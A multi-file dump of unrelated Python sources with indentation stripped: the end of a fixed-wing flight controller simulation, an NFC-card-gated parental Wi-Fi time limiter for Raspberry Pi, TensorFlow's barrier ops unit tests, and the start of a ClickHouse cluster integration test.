uyaw = kd[2]*(des_w2 - fixwing.w[2])
fixwing.update(cmd.thr, uroll, upitch, -uyaw, t, dt)
print " e: ", np.rad2deg(np.round(e, 3))
elif use_controller == 2: # PID
uroll = kp[0]*(des_roll - roll) + kd[0]*(des_w0 - fixwing.w[0]) + integ_roll
upitch = kp[1]*(des_pitch - pitch) + kd[1]*(des_w1 - fixwing.w[1]) + integ_pitch
uyaw = kd[2]*(des_w2 - fixwing.w[2])
integ_roll += dt*1*(des_roll - roll)
integ_pitch += dt*3*(des_pitch - pitch)
fixwing.update(cmd.thr, uroll, upitch, -uyaw, t, dt)
print "integs roll, pitch: ", np.round((integ_roll, integ_pitch), 2), "| e: ", np.round(np.rad2deg(e), 1)
elif use_controller == 3: # adaptive
Cp = fixwing.Cp1
s = fixwing.v
E = np.array([1, 1, 1])
ff = (-dens*np.cross(rc, Cp*s) - np.cross(fixwing.w, fixwing.M.dot(fixwing.w)))# / (dens*E*npl.norm(s)**2)
uroll = kp[0]*e[0] + kd[0]*(des_w0 - fixwing.w[0]) - ff[0]
upitch = kp[1]*e[1] + kd[1]*(des_w1 - fixwing.w[1]) - ff[1]
uyaw = kp[2]*e[2] + kd[2]*(des_w2 - fixwing.w[2]) - ff[2]
Y = dens*np.array([[ 0, -Cp[2]*s[2], Cp[1]*s[1]],
[ Cp[2]*s[2], 0, -Cp[0]*s[0]],
[-Cp[1]*s[1], Cp[0]*s[0], 0]])
rc = rc - dt*0.03*([1, 1, 1]*Y.T.dot(kp*e + kd*([des_w0, des_w1, des_w2] - fixwing.w)))
# rc = [-0.019, 0, 0]
# print "ff: ", np.round(ff, 3)
print "rc: ", np.round(rc, 3), "| e: ", np.round(np.rad2deg(e), 1)
fixwing.update(cmd.thr, uroll, upitch, -uyaw, t, dt)
else: # direct inputs
fixwing.update(cmd.thr, cmd.roll, cmd.pitch, cmd.yaw, t, dt)
# print np.round(np.rad2deg(roll), 3), np.round(np.rad2deg(pitch), 3), np.round(np.rad2deg(yaw), 3)
# fixwing.w = np.array([des_w0, des_w1, des_w2]) # IDEAL OVERRIDE
# fixwing.q = quaternion_from_euler(des_roll, des_pitch, 0)
t += dt
# Update camera state according to user input
if cam_follow: cam_state["focalpoint"] = fixwing.p.tolist()
cam_state["azimuth"] += dt*cam_azim_rate
cam_state["elevation"] += dt*cam_elev_rate
cam_state["distance"] = np.clip(cam_state["distance"] + dt*cam_dist_rate, 5, np.inf)
# Re-render changed parts of the scene at this real-time instant
viz.update(fixwing.p, fixwing.q, fixwing.surfaces, cam_state)
yield
# print fixwing.surfaces[0].u, fixwing.surfaces[1].u
# Start'er up
pilot.start_pilot_thread()
simulate()
viz.show() # blocking
# Be nice
pilot.stop_pilot_thread()
|
meteredwifi4kids.py
|
# https://github.com/mgthk/meteredwifi4kids
#
# This program is provided as it, without any warranty.
# Thank you for using this program. I hope it works well for you.
# Feel free to improve it.
#
import threading
import datetime
import time
import I2C_LCD_driver
from py532lib.i2c import *
from py532lib.frame import *
from py532lib.constants import *
from collections import deque #use as a fifo queue
def nfc_reader():
pn532 = Pn532_i2c()
pn532.SAMconfigure()
while True:
if not running:
print("Not running")
return
card_data = pn532.read_mifare().get_data()
if card_data is None:
print("Card data is none")
continue
card_data_hex_string = "".join("%02x" % b for b in card_data)
cardid = card_data_hex_string[-8:]
print("Card id : " + cardid)
with queue_lock:
# replaced print with deque.append
queue.append(cardid)
#time.sleep(1)
def wifi_usage_timer():
global wifi_usage_remain_minute
wifi_usage_remain_count_file = "/home/pi/py532lib/" + datetime.datetime.now().strftime("%Y%m%d")
print("Usage remaining counter file : " + wifi_usage_remain_count_file)
while True:
if not os.path.isfile(wifi_usage_remain_count_file):
print(wifi_usage_remain_count_file + " not exists. Create one and set default.")
count_file = open(wifi_usage_remain_count_file,"w+")
count_file.write(str(authorized_wifi_usage_remain_minute))
count_file.close()
count_file = open(wifi_usage_remain_count_file,"r")
wifi_usage_remain_minute = int(count_file.read())
count_file.close()
if isWiFiEnabled:
print("Sleep 60 seconds...")
time.sleep(60)
wifi_usage_remain_minute = wifi_usage_remain_minute - 1
count_file = open(wifi_usage_remain_count_file,"w")
count_file.write(str(wifi_usage_remain_minute))
count_file.close()
print("WiFi usage remaining in minute =", wifi_usage_remain_minute)
#else:
#print("WiFi not enabled. Counter not update. WiFi usage remaining in minute =", wifi_usage_remain_minute)
def enableWifi():
print("Enabling WiFi")
#run systemctl start hostapd
os.system("/usr/bin/sudo /bin/systemctl start hostapd")
return True
def disableWifi():
print("Disabling WiFi")
#run systemctl stop hostapd
os.system("/usr/bin/sudo /bin/systemctl stop hostapd")
return False
def updateLCD():
print("updateLCD")
isWiFiEnabled
wifi_usage_remain_minute
wifi_status = "Off"
if isWiFiEnabled:
wifi_status = "On"
else:
wifi_status = "Off"
lcdMsg1 = "Wifi " + wifi_status + ". " + str(wifi_usage_remain_minute) + " min "
mylcd.lcd_display_string(lcdMsg1, 1)
now = datetime.datetime.now()
lcdMsg2 = now.strftime("%Y-%m-%d %H:%M")
mylcd.lcd_display_string(lcdMsg2, 2)
#time.sleep(1)
def isAuthorizedCard(provided_cardid):
print("Detected card id:", provided_cardid)
print("Authorized card id:", authorized_cardid)
if authorized_cardid == provided_cardid:
print("card authorized")
return True
else:
print("card not authorized")
return False
#Main
#Init params
no_card_timer=0
isWiFiEnabled=False
wifi_usage_remain_minute=0
queue = deque() #queue to pass information from thread to main process
queue_lock = threading.Lock() #prevent possible issues from
running = True
print("Init LCD... ")
mylcd = I2C_LCD_driver.lcd()
mylcd.lcd_clear()
#wifi_usage_remain_count_file = "/home/pi/py532lib/" + datetime.datetime.now().strftime("%Y%m%d")
#print("Usage remaining counter file : " + wifi_usage_remain_count_file)
authorized_cardid_file = "/home/pi/py532lib/authorizedcardid"
print("authorized cardid file : " + authorized_cardid_file)
cardid_file = open(authorized_cardid_file,"r")
authorized_cardid = cardid_file.read().rstrip()
cardid_file.close()
authorized_wifitime_file = "/home/pi/py532lib/authorizedwifitime"
print("authorized wifi time file : " + authorized_wifitime_file)
wifitime_file = open(authorized_wifitime_file,"r")
authorized_wifi_usage_remain_minute = int(wifitime_file.read().rstrip())
wifitime_file.close()
nfc_thread = threading.Thread(target=nfc_reader)
nfc_thread.start()
wifi_usage_timer_thread = threading.Thread(target=wifi_usage_timer)
wifi_usage_timer_thread.start()
disableWifi()
updateLCD()
while True: #also cheap, but easy
if queue: #bool(deque) works like bool(list)
with queue_lock:
cardid = queue.popleft()
no_card_timer=0
print("isWiFiEnabled", isWiFiEnabled)
if wifi_usage_remain_minute <= 0:
isWiFiEnabled = disableWifi()
if isWiFiEnabled:
print("Wifi already enabled. Do Nothing")
else:
if wifi_usage_remain_minute > 0 :
if isAuthorizedCard(cardid):
print("Card authorized : ", cardid)
isWiFiEnabled = enableWifi()
else:
print("Card not authorized : ", cardid)
disableWifi()
else:
print("No more usage time left.", wifi_usage_remain_minute)
updateLCD()
continue
else:
no_card_timer = no_card_timer+1
#print ("Card not present timer = ", no_card_timer)
if no_card_timer >= 10:
no_card_timer=0
print("isWiFiEnabled", isWiFiEnabled)
#unconditional force shutdown wifi
isWiFiEnabled = disableWifi()
updateLCD()
time.sleep(1)
|
barrier_ops_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for barrier ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import data_flow_ops
class BarrierTest(tf.test.TestCase):
def testConstructorWithShapes(self):
with tf.Graph().as_default():
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((1, 2, 3), (8,)),
shared_name="B",
name="B")
self.assertTrue(isinstance(b.barrier_ref, tf.Tensor))
self.assertEquals(tf.string_ref, b.barrier_ref.dtype)
self.assertProtoEquals("""
name:'B' op:'Barrier'
attr {
key: "capacity"
value {
i: -1
}
}
attr { key: 'component_types'
value { list { type: DT_FLOAT type: DT_FLOAT } } }
attr {
key: 'shapes'
value {
list {
shape {
dim { size: 1 } dim { size: 2 } dim { size: 3 }
}
shape {
dim { size: 8 }
}
}
}
}
attr { key: 'container' value { s: "" } }
attr { key: 'shared_name' value: { s: 'B' } }
""", b.barrier_ref.op.node_def)
def testInsertMany(self):
with self.test_session():
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
self.assertEqual([], size_t.get_shape())
keys = [b"a", b"b", b"c"]
insert_0_op = b.insert_many(0, keys, [10.0, 20.0, 30.0])
insert_1_op = b.insert_many(1, keys, [100.0, 200.0, 300.0])
self.assertEquals(size_t.eval(), [0])
insert_0_op.run()
self.assertEquals(size_t.eval(), [0])
insert_1_op.run()
self.assertEquals(size_t.eval(), [3])
def testInsertManyEmptyTensor(self):
with self.test_session():
error_message = ("Empty tensors are not supported, but received shape "
r"\'\(0,\)\' at index 1")
with self.assertRaisesRegexp(ValueError, error_message):
data_flow_ops.Barrier((tf.float32, tf.float32),
shapes=((1,), (0,)),
name="B")
def testInsertManyEmptyTensorUnknown(self):
with self.test_session():
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
name="B")
size_t = b.ready_size()
self.assertEqual([], size_t.get_shape())
keys = [b"a", b"b", b"c"]
insert_0_op = b.insert_many(0, keys, np.array([[], [], []], np.float32))
self.assertEquals(size_t.eval(), [0])
with self.assertRaisesOpError(
".*Tensors with no elements are not supported.*"):
insert_0_op.run()
def testTakeMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
keys = [b"a", b"b", b"c"]
values_0 = [10.0, 20.0, 30.0]
values_1 = [100.0, 200.0, 300.0]
insert_0_op = b.insert_many(0, keys, values_0)
insert_1_op = b.insert_many(1, keys, values_1)
take_t = b.take_many(3)
insert_0_op.run()
insert_1_op.run()
self.assertEquals(size_t.eval(), [3])
indices_val, keys_val, values_0_val, values_1_val = sess.run([
take_t[0], take_t[1], take_t[2][0], take_t[2][1]])
self.assertAllEqual(indices_val, [-2**63] * 3)
for k, v0, v1 in zip(keys, values_0, values_1):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
def testTakeManySmallBatch(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
size_i = b.incomplete_size()
keys = [b"a", b"b", b"c", b"d"]
values_0 = [10.0, 20.0, 30.0, 40.0]
values_1 = [100.0, 200.0, 300.0, 400.0]
insert_0_op = b.insert_many(0, keys, values_0)
# Split adding of the second component into two independent operations.
# After insert_1_1_op, we'll have two ready elements in the barrier,
# 2 will still be incomplete.
insert_1_1_op = b.insert_many(1, keys[0:2], values_1[0:2]) # add "a", "b"
insert_1_2_op = b.insert_many(1, keys[2:3], values_1[2:3]) # add "c"
insert_1_3_op = b.insert_many(1, keys[3:], values_1[3:]) # add "d"
insert_empty_op = b.insert_many(0, [], [])
close_op = b.close()
close_op_final = b.close(cancel_pending_enqueues=True)
index_t, key_t, value_list_t = b.take_many(3, allow_small_batch=True)
insert_0_op.run()
insert_1_1_op.run()
close_op.run()
# Now we have a closed barrier with 2 ready elements. Running take_t
# should return a reduced batch with 2 elements only.
self.assertEquals(size_i.eval(), [2]) # assert that incomplete size = 2
self.assertEquals(size_t.eval(), [2]) # assert that ready size = 2
_, keys_val, values_0_val, values_1_val = sess.run([
index_t, key_t, value_list_t[0], value_list_t[1]
])
# Check that correct values have been returned.
for k, v0, v1 in zip(keys[0:2], values_0[0:2], values_1[0:2]):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
# The next insert completes the element with key "c". The next take_t
# should return a batch with just 1 element.
insert_1_2_op.run()
self.assertEquals(size_i.eval(), [1]) # assert that incomplete size = 1
self.assertEquals(size_t.eval(), [1]) # assert that ready size = 1
_, keys_val, values_0_val, values_1_val = sess.run([
index_t, key_t, value_list_t[0], value_list_t[1]
])
# Check that correct values have been returned.
for k, v0, v1 in zip(keys[2:3], values_0[2:3], values_1[2:3]):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
# Adding nothing ought to work, even if the barrier is closed.
insert_empty_op.run()
# currently keys "a" and "b" are not in the barrier, adding them
# again after it has been closed, ought to cause failure.
with self.assertRaisesOpError("is closed"):
insert_1_1_op.run()
close_op_final.run()
# These ops should fail because the barrier has now been closed with
# cancel_pending_enqueues = True.
with self.assertRaisesOpError("is closed"):
insert_empty_op.run()
with self.assertRaisesOpError("is closed"):
insert_1_3_op.run()
def testUseBarrierWithShape(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 2), (8,)),
name="B")
size_t = b.ready_size()
keys = [b"a", b"b", b"c"]
values_0 = np.array(
[[[10.0] * 2] * 2, [[20.0] * 2] * 2, [[30.0] * 2] * 2], np.float32)
values_1 = np.array([[100.0] * 8, [200.0] * 8, [300.0] * 8],
np.float32)
insert_0_op = b.insert_many(0, keys, values_0)
insert_1_op = b.insert_many(1, keys, values_1)
take_t = b.take_many(3)
insert_0_op.run()
insert_1_op.run()
self.assertEquals(size_t.eval(), [3])
indices_val, keys_val, values_0_val, values_1_val = sess.run([
take_t[0], take_t[1], take_t[2][0], take_t[2][1]])
self.assertAllEqual(indices_val, [-2**63] * 3)
self.assertShapeEqual(keys_val, take_t[1])
self.assertShapeEqual(values_0_val, take_t[2][0])
self.assertShapeEqual(values_1_val, take_t[2][1])
for k, v0, v1 in zip(keys, values_0, values_1):
idx = keys_val.tolist().index(k)
self.assertAllEqual(values_0_val[idx], v0)
self.assertAllEqual(values_1_val[idx], v1)
def testParallelInsertMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(tf.float32, shapes=())
size_t = b.ready_size()
keys = [str(x).encode("ascii") for x in range(10)]
values = [float(x) for x in range(10)]
insert_ops = [b.insert_many(0, [k], [v]) for k, v in zip(keys, values)]
take_t = b.take_many(10)
sess.run(insert_ops)
self.assertEquals(size_t.eval(), [10])
indices_val, keys_val, values_val = sess.run(
[take_t[0], take_t[1], take_t[2][0]])
self.assertAllEqual(indices_val, [-2**63 + x for x in range(10)])
for k, v in zip(keys, values):
idx = keys_val.tolist().index(k)
self.assertEqual(values_val[idx], v)
def testParallelTakeMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(tf.float32, shapes=())
size_t = b.ready_size()
keys = [str(x).encode("ascii") for x in range(10)]
values = [float(x) for x in range(10)]
insert_op = b.insert_many(0, keys, values)
take_t = [b.take_many(1) for _ in keys]
insert_op.run()
self.assertEquals(size_t.eval(), [10])
index_fetches = []
key_fetches = []
value_fetches = []
for ix_t, k_t, v_t in take_t:
index_fetches.append(ix_t)
key_fetches.append(k_t)
value_fetches.append(v_t[0])
vals = sess.run(index_fetches + key_fetches + value_fetches)
index_vals = vals[:len(keys)]
key_vals = vals[len(keys):2 * len(keys)]
value_vals = vals[2 * len(keys):]
taken_elems = []
for k, v in zip(key_vals, value_vals):
taken_elems.append((k[0], v[0]))
self.assertAllEqual(np.hstack(index_vals), [-2**63] * 10)
self.assertItemsEqual(
zip(keys, values),
[(k[0], v[0]) for k, v in zip(key_vals, value_vals)])
def testBlockingTakeMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(tf.float32, shapes=())
keys = [str(x).encode("ascii") for x in range(10)]
values = [float(x) for x in range(10)]
insert_ops = [b.insert_many(0, [k], [v]) for k, v in zip(keys, values)]
take_t = b.take_many(10)
def take():
indices_val, keys_val, values_val = sess.run(
[take_t[0], take_t[1], take_t[2][0]])
self.assertAllEqual(
indices_val, [int(x.decode("ascii")) - 2**63 for x in keys_val])
self.assertItemsEqual(zip(keys, values), zip(keys_val, values_val))
t = self.checkedThread(target=take)
t.start()
time.sleep(0.1)
for insert_op in insert_ops:
insert_op.run()
t.join()
def testParallelInsertManyTakeMany(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.int64), shapes=((), (2,)))
num_iterations = 100
keys = [str(x) for x in range(10)]
values_0 = np.asarray(range(10), dtype=np.float32)
values_1 = np.asarray([[x+1, x + 2] for x in range(10)], dtype=np.int64)
keys_i = lambda i: [("%d:%s" % (i, k)).encode("ascii") for k in keys]
insert_0_ops = [
b.insert_many(0, keys_i(i), values_0 + i)
for i in range(num_iterations)]
insert_1_ops = [
b.insert_many(1, keys_i(i), values_1 + i)
for i in range(num_iterations)]
take_ops = [b.take_many(10) for _ in range(num_iterations)]
def take(sess, i, taken):
indices_val, keys_val, values_0_val, values_1_val = sess.run(
[take_ops[i][0], take_ops[i][1],
take_ops[i][2][0], take_ops[i][2][1]])
taken.append({"indices": indices_val,
"keys": keys_val,
"values_0": values_0_val,
"values_1": values_1_val})
def insert(sess, i):
sess.run([insert_0_ops[i], insert_1_ops[i]])
taken = []
take_threads = [
self.checkedThread(target=take, args=(sess, i, taken))
for i in range(num_iterations)]
insert_threads = [
self.checkedThread(target=insert, args=(sess, i))
for i in range(num_iterations)]
for t in take_threads:
t.start()
time.sleep(0.1)
for t in insert_threads:
t.start()
for t in take_threads:
t.join()
for t in insert_threads:
t.join()
self.assertEquals(len(taken), num_iterations)
flatten = lambda l: [item for sublist in l for item in sublist]
all_indices = sorted(flatten([t_i["indices"] for t_i in taken]))
all_keys = sorted(flatten([t_i["keys"] for t_i in taken]))
expected_keys = sorted(flatten(
[keys_i(i) for i in range(num_iterations)]))
expected_indices = sorted(flatten(
[-2**63 + j] * 10 for j in range(num_iterations)))
self.assertAllEqual(all_indices, expected_indices)
self.assertAllEqual(all_keys, expected_keys)
for taken_i in taken:
outer_indices_from_keys = np.array(
[int(k.decode("ascii").split(":")[0]) for k in taken_i["keys"]])
inner_indices_from_keys = np.array(
[int(k.decode("ascii").split(":")[1]) for k in taken_i["keys"]])
self.assertAllEqual(taken_i["values_0"],
outer_indices_from_keys + inner_indices_from_keys)
expected_values_1 = np.vstack(
(1 + outer_indices_from_keys + inner_indices_from_keys,
2 + outer_indices_from_keys + inner_indices_from_keys)).T
self.assertAllEqual(taken_i["values_1"], expected_values_1)
def testClose(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
incomplete_t = b.incomplete_size()
keys = [b"a", b"b", b"c"]
values_0 = [10.0, 20.0, 30.0]
values_1 = [100.0, 200.0, 300.0]
insert_0_op = b.insert_many(0, keys, values_0)
insert_1_op = b.insert_many(1, keys, values_1)
close_op = b.close()
fail_insert_op = b.insert_many(0, ["f"], [60.0])
take_t = b.take_many(3)
take_too_many_t = b.take_many(4)
self.assertEquals(size_t.eval(), [0])
self.assertEquals(incomplete_t.eval(), [0])
insert_0_op.run()
self.assertEquals(size_t.eval(), [0])
self.assertEquals(incomplete_t.eval(), [3])
close_op.run()
# This op should fail because the barrier is closed.
with self.assertRaisesOpError("is closed"):
fail_insert_op.run()
# This op should succeed because the barrier has not cancelled
# pending enqueues
insert_1_op.run()
self.assertEquals(size_t.eval(), [3])
self.assertEquals(incomplete_t.eval(), [0])
# This op should fail because the barrier is closed.
with self.assertRaisesOpError("is closed"):
fail_insert_op.run()
# This op should fail because we requested more elements than are
# available in incomplete + ready queue.
with self.assertRaisesOpError(
r"is closed and has insufficient elements "
r"\(requested 4, total size 3\)"):
sess.run(take_too_many_t[0]) # Sufficient to request just the indices
# This op should succeed because there are still completed elements
# to process.
indices_val, keys_val, values_0_val, values_1_val = sess.run(
[take_t[0], take_t[1], take_t[2][0], take_t[2][1]])
self.assertAllEqual(indices_val, [-2**63] * 3)
for k, v0, v1 in zip(keys, values_0, values_1):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
# This op should fail because there are no more completed elements and
# the queue is closed.
with self.assertRaisesOpError("is closed and has insufficient elements"):
sess.run(take_t[0])
def testCancel(self):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
incomplete_t = b.incomplete_size()
keys = [b"a", b"b", b"c"]
values_0 = [10.0, 20.0, 30.0]
values_1 = [100.0, 200.0, 300.0]
insert_0_op = b.insert_many(0, keys, values_0)
insert_1_op = b.insert_many(1, keys[0:2], values_1[0:2])
insert_2_op = b.insert_many(1, keys[2:], values_1[2:])
cancel_op = b.close(cancel_pending_enqueues=True)
fail_insert_op = b.insert_many(0, ["f"], [60.0])
take_t = b.take_many(2)
take_too_many_t = b.take_many(3)
self.assertEquals(size_t.eval(), [0])
insert_0_op.run()
insert_1_op.run()
self.assertEquals(size_t.eval(), [2])
self.assertEquals(incomplete_t.eval(), [1])
cancel_op.run()
# This op should fail because the queue is closed.
with self.assertRaisesOpError("is closed"):
fail_insert_op.run()
# This op should fail because the queue is cancelled.
with self.assertRaisesOpError("is closed"):
insert_2_op.run()
# This op should fail because we requested more elements than are
# available in incomplete + ready queue.
with self.assertRaisesOpError(
r"is closed and has insufficient elements "
r"\(requested 3, total size 2\)"):
sess.run(take_too_many_t[0]) # Sufficient to request just the indices
# This op should succeed because there are still completed elements
# to process.
indices_val, keys_val, values_0_val, values_1_val = sess.run(
[take_t[0], take_t[1], take_t[2][0], take_t[2][1]])
self.assertAllEqual(indices_val, [-2**63] * 2)
for k, v0, v1 in zip(keys[0:2], values_0[0:2], values_1[0:2]):
idx = keys_val.tolist().index(k)
self.assertEqual(values_0_val[idx], v0)
self.assertEqual(values_1_val[idx], v1)
# This op should fail because there are no more completed elements and
# the queue is closed.
with self.assertRaisesOpError("is closed and has insufficient elements"):
sess.run(take_t[0])
def _testClosedEmptyBarrierTakeManyAllowSmallBatchRaises(self, cancel):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.float32), shapes=((), ()), name="B")
take_t = b.take_many(1, allow_small_batch=True)
sess.run(b.close(cancel))
with self.assertRaisesOpError("is closed and has insufficient elements"):
sess.run(take_t)
def testClosedEmptyBarrierTakeManyAllowSmallBatchRaises(self):
self._testClosedEmptyBarrierTakeManyAllowSmallBatchRaises(cancel=False)
self._testClosedEmptyBarrierTakeManyAllowSmallBatchRaises(cancel=True)
def _testParallelInsertManyTakeManyCloseHalfwayThrough(self, cancel):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.int64), shapes=((), (2,)))
num_iterations = 50
keys = [str(x) for x in range(10)]
values_0 = np.asarray(range(10), dtype=np.float32)
values_1 = np.asarray([[x + 1, x + 2] for x in range(10)], dtype=np.int64)
keys_i = lambda i: [("%d:%s" % (i, k)).encode("ascii") for k in keys]
insert_0_ops = [
b.insert_many(0, keys_i(i), values_0 + i)
for i in range(num_iterations)]
insert_1_ops = [
b.insert_many(1, keys_i(i), values_1 + i)
for i in range(num_iterations)]
take_ops = [b.take_many(10) for _ in range(num_iterations)]
close_op = b.close(cancel_pending_enqueues=cancel)
def take(sess, i, taken):
try:
indices_val, unused_keys_val, unused_val_0, unused_val_1 = sess.run(
[take_ops[i][0], take_ops[i][1],
take_ops[i][2][0], take_ops[i][2][1]])
taken.append(len(indices_val))
except tf.errors.OutOfRangeError:
taken.append(0)
def insert(sess, i):
try:
sess.run([insert_0_ops[i], insert_1_ops[i]])
except tf.errors.CancelledError:
pass
taken = []
take_threads = [
self.checkedThread(target=take, args=(sess, i, taken))
for i in range(num_iterations)]
insert_threads = [
self.checkedThread(target=insert, args=(sess, i))
for i in range(num_iterations)]
first_half_insert_threads = insert_threads[:num_iterations//2]
second_half_insert_threads = insert_threads[num_iterations//2:]
for t in take_threads:
t.start()
for t in first_half_insert_threads:
t.start()
for t in first_half_insert_threads:
t.join()
close_op.run()
for t in second_half_insert_threads:
t.start()
for t in take_threads:
t.join()
for t in second_half_insert_threads:
t.join()
self.assertEqual(
sorted(taken), [0] * (num_iterations//2) + [10] * (num_iterations//2))
def testParallelInsertManyTakeManyCloseHalfwayThrough(self):
self._testParallelInsertManyTakeManyCloseHalfwayThrough(cancel=False)
def testParallelInsertManyTakeManyCancelHalfwayThrough(self):
self._testParallelInsertManyTakeManyCloseHalfwayThrough(cancel=True)
def _testParallelPartialInsertManyTakeManyCloseHalfwayThrough(self, cancel):
with self.test_session() as sess:
b = data_flow_ops.Barrier(
(tf.float32, tf.int64), shapes=((), (2,)))
num_iterations = 100
keys = [str(x) for x in range(10)]
values_0 = np.asarray(range(10), dtype=np.float32)
values_1 = np.asarray([[x + 1, x + 2] for x in range(10)], dtype=np.int64)
keys_i = lambda i: [("%d:%s" % (i, k)).encode("ascii") for k in keys]
insert_0_ops = [
b.insert_many(0, keys_i(i), values_0 + i, name="insert_0_%d" % i)
for i in range(num_iterations)]
close_op = b.close(cancel_pending_enqueues=cancel)
take_ops = [b.take_many(10, name="take_%d" % i)
for i in range(num_iterations)]
# insert_1_ops will only run after closure
insert_1_ops = [
b.insert_many(1, keys_i(i), values_1 + i, name="insert_1_%d" % i)
for i in range(num_iterations)]
def take(sess, i, taken):
if cancel:
try:
indices_val, unused_keys_val, unused_val_0, unused_val_1 = sess.run(
[take_ops[i][0], take_ops[i][1],
take_ops[i][2][0], take_ops[i][2][1]])
taken.append(len(indices_val))
except tf.errors.OutOfRangeError:
taken.append(0)
else:
indices_val, unused_keys_val, unused_val_0, unused_val_1 = sess.run(
[take_ops[i][0], take_ops[i][1],
take_ops[i][2][0], take_ops[i][2][1]])
taken.append(len(indices_val))
def insert_0(sess, i):
insert_0_ops[i].run(session=sess)
def insert_1(sess, i):
if cancel:
try:
insert_1_ops[i].run(session=sess)
except tf.errors.CancelledError:
pass
else:
insert_1_ops[i].run(session=sess)
taken = []
take_threads = [
self.checkedThread(target=take, args=(sess, i, taken))
for i in range(num_iterations)]
insert_0_threads = [
self.checkedThread(target=insert_0, args=(sess, i))
for i in range(num_iterations)]
insert_1_threads = [
self.checkedThread(target=insert_1, args=(sess, i))
for i in range(num_iterations)]
for t in insert_0_threads:
t.start()
for t in insert_0_threads:
t.join()
for t in take_threads:
t.start()
close_op.run()
for t in insert_1_threads:
t.start()
for t in take_threads:
t.join()
for t in insert_1_threads:
t.join()
if cancel:
self.assertEqual(taken, [0] * num_iterations)
else:
self.assertEqual(taken, [10] * num_iterations)
def testParallelPartialInsertManyTakeManyCloseHalfwayThrough(self):
self._testParallelPartialInsertManyTakeManyCloseHalfwayThrough(cancel=False)
def testParallelPartialInsertManyTakeManyCancelHalfwayThrough(self):
self._testParallelPartialInsertManyTakeManyCloseHalfwayThrough(cancel=True)
def testIncompatibleSharedBarrierErrors(self):
with self.test_session():
# Do component types and shapes.
b_a_1 = data_flow_ops.Barrier((tf.float32,), shapes=(()),
shared_name="b_a")
b_a_2 = data_flow_ops.Barrier((tf.int32,), shapes=(()),
shared_name="b_a")
b_a_1.barrier_ref.eval()
with self.assertRaisesOpError("component types"):
b_a_2.barrier_ref.eval()
b_b_1 = data_flow_ops.Barrier((tf.float32,), shapes=(()),
shared_name="b_b")
b_b_2 = data_flow_ops.Barrier(
(tf.float32, tf.int32),
shapes=((), ()),
shared_name="b_b")
b_b_1.barrier_ref.eval()
with self.assertRaisesOpError("component types"):
b_b_2.barrier_ref.eval()
b_c_1 = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 2), (8,)),
shared_name="b_c")
b_c_2 = data_flow_ops.Barrier(
(tf.float32, tf.float32), shared_name="b_c")
b_c_1.barrier_ref.eval()
with self.assertRaisesOpError("component shapes"):
b_c_2.barrier_ref.eval()
b_d_1 = data_flow_ops.Barrier(
(tf.float32, tf.float32), shapes=((), ()),
shared_name="b_d")
b_d_2 = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 2), (8,)),
shared_name="b_d")
b_d_1.barrier_ref.eval()
with self.assertRaisesOpError("component shapes"):
b_d_2.barrier_ref.eval()
b_e_1 = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 2), (8,)),
shared_name="b_e")
b_e_2 = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((2, 5), (8,)),
shared_name="b_e")
b_e_1.barrier_ref.eval()
with self.assertRaisesOpError("component shapes"):
b_e_2.barrier_ref.eval()
if __name__ == "__main__":
tf.test.main()
|
test.py
|
import random
import string
import threading
import time
from multiprocessing.dummy import Pool
import pytest
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
cluster = ClickHouseCluster(__file__)
node1 = cluster.add_instance('node1',
main_configs=['configs/logs_config.xml', "configs/config.d/instant_moves.xml",
"configs/config.d/storage_configuration.xml",
"configs/config.d/cluster.xml", ],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 1})
node2 = cluster.add_instance('node2',
main_configs=['configs/logs_config.xml', "configs/config.d/instant_moves.xml",
"configs/config.d/storage_configuration.xml",
"configs/config.d/cluster.xml", ],
with_zookeeper=True,
tmpfs=['/jbod1:size=40M', '/jbod2:size=40M', '/external:size=200M'],
macros={"shard": 0, "replica": 2})
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster.start()
yield cluster
finally:
